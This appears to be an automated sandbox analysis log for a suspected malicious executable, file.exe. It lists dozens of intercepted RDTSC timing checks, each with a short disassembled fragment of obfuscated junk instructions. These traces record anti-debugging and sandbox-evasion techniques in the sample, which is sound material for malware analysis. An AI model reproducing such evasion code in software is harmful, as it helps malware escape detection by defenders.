Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B15D second address: D3B19F instructions: 0x00000000 rdtsc 0x00000002 js 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jl 00007F1BE4ECC0A9h 0x00000011 jp 00007F1BE4ECC077h 0x00000017 pushad 0x00000018 jmp 00007F1BE4ECC075h 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D460CF second address: D460E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jbe 00007F1BE47673C6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D460E1 second address: D4612D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE4ECC06Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jg 00007F1BE4ECC066h 0x00000010 jno 00007F1BE4ECC06Ch 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jng 00007F1BE4ECC089h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4988C second address: D498B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1BE47673C6h 0x0000000a jmp 00007F1BE47673CEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1BE47673CCh 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D498B5 second address: D498B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D498B9 second address: D498C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D498C7 second address: D498CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49426 second address: D4942A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4942A second address: D49430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49430 second address: D49451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F1BE47673C6h 0x0000000d jno 00007F1BE47673C6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jnl 00007F1BE47673C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49451 second address: D49477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1BE4ECC071h 0x0000000c jmp 00007F1BE4ECC06Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B16F second address: D5B17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B17D second address: D5B181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B181 second address: D5B1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F1BE47673DFh 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F1BE47673C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F47 second address: D64F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F4D second address: D64F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F60 second address: D64F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F1BE4ECC066h 0x0000000b jc 00007F1BE4ECC066h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F78 second address: D64F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F7E second address: D64F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F82 second address: D64F88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63B42 second address: D63B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C77 second address: D63C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C7B second address: D63C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C81 second address: D63C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C8A second address: D63CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC079h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67C79 second address: D67C83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BE47673CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D679C0 second address: D679C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A88 second address: D78A8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A8E second address: D78AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BE4ECC072h 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 jo 00007F1BE4ECC072h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A332 second address: D7A33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A33C second address: D7A360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jg 00007F1BE4ECC066h 0x00000010 jmp 00007F1BE4ECC072h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87836 second address: D87847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnp 00007F1BE47673C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87847 second address: D8784B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6F6 second address: D8A6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6FA second address: D8A6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6FE second address: D8A708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A708 second address: D8A719 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BE4ECC066h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA296B second address: DA296F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA296F second address: DA2975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2DAB second address: DA2DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2DAF second address: DA2DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3343 second address: DA3349 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3349 second address: DA334E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA334E second address: DA3373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1BE47673D8h 0x0000000c je 00007F1BE47673C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA615C second address: DA6162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA6162 second address: DA6166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA6342 second address: DA6346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA7920 second address: DA793C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1BE47673D7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA793C second address: DA794E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F1BE4ECC066h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9119 second address: DA9123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9123 second address: DA9129 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9129 second address: DA912F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB0A2 second address: DAB0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1BE4ECC066h 0x0000000a jnp 00007F1BE4ECC066h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534002E second address: 534006D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1BE47673D1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1BE47673CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534006D second address: 5340073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340073 second address: 5340077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340077 second address: 53400A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1BE4ECC06Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1BE4ECC070h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53400A5 second address: 53400AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53400AB second address: 53400B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330043 second address: 5330052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330052 second address: 53300BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 0703h 0x0000000f mov cx, 105Fh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F1BE4ECC072h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1BE4ECC06Dh 0x00000025 xor esi, 3389A336h 0x0000002b jmp 00007F1BE4ECC071h 0x00000030 popfd 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53300BB second address: 53300C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53300C9 second address: 53300CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537010D second address: 5370113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53000F7 second address: 5300145 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1BE4ECC072h 0x00000008 adc eax, 5AF0B3F8h 0x0000000e jmp 00007F1BE4ECC06Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, cx 0x0000001e pushfd 0x0000001f jmp 00007F1BE4ECC06Ch 0x00000024 sbb ch, 00000058h 0x00000027 jmp 00007F1BE4ECC06Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300145 second address: 53001B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, E9h 0x00000005 pushfd 0x00000006 jmp 00007F1BE47673D0h 0x0000000b adc si, 18B8h 0x00000010 jmp 00007F1BE47673CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F1BE47673D2h 0x00000022 pop esi 0x00000023 pushfd 0x00000024 jmp 00007F1BE47673CBh 0x00000029 and ah, 0000002Eh 0x0000002c jmp 00007F1BE47673D9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53001B0 second address: 53001C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC06Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53001C0 second address: 53001C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53001C4 second address: 5300240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F1BE4ECC079h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push esi 0x00000014 mov bx, 0A9Eh 0x00000018 pop edi 0x00000019 jmp 00007F1BE4ECC074h 0x0000001e popad 0x0000001f push dword ptr [ebp+04h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F1BE4ECC06Eh 0x00000029 add si, 1C98h 0x0000002e jmp 00007F1BE4ECC06Bh 0x00000033 popfd 0x00000034 mov dh, ch 0x00000036 popad 0x00000037 push dword ptr [ebp+0Ch] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F1BE4ECC06Eh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320D05 second address: 5320D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320D0A second address: 5320D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1BE4ECC06Dh 0x0000000a adc ax, 6A66h 0x0000000f jmp 00007F1BE4ECC071h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a call 00007F1BE4ECC06Ch 0x0000001f mov ebx, ecx 0x00000021 pop ecx 0x00000022 call 00007F1BE4ECC077h 0x00000027 mov ebx, esi 0x00000029 pop esi 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov ch, dl 0x00000034 mov cx, 0E2Dh 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320D70 second address: 5320D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532075C second address: 5320777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC077h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320777 second address: 53207A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F1BE47673D2h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1BE47673CAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207A3 second address: 53207A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207A7 second address: 53207AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207AD second address: 53207CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, 4DD0h 0x00000012 movsx ebx, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320672 second address: 5320678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320678 second address: 53206CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1BE4ECC06Eh 0x00000011 jmp 00007F1BE4ECC075h 0x00000016 popfd 0x00000017 mov ch, ABh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1BE4ECC074h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53206CD second address: 53206DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53206DC second address: 5320720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 16ABB79Ah 0x00000008 mov dh, B3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F1BE4ECC06Ah 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1BE4ECC070h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1BE4ECC077h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320333 second address: 5320337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320337 second address: 532033D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532033D second address: 5320343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320343 second address: 5320347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320347 second address: 532034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532034B second address: 532035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532035A second address: 5320370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320370 second address: 532039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1BE4ECC076h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532039E second address: 53203BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533030E second address: 5330312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330312 second address: 533033F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007F1BE47673D0h 0x00000010 pop esi 0x00000011 rdtsc
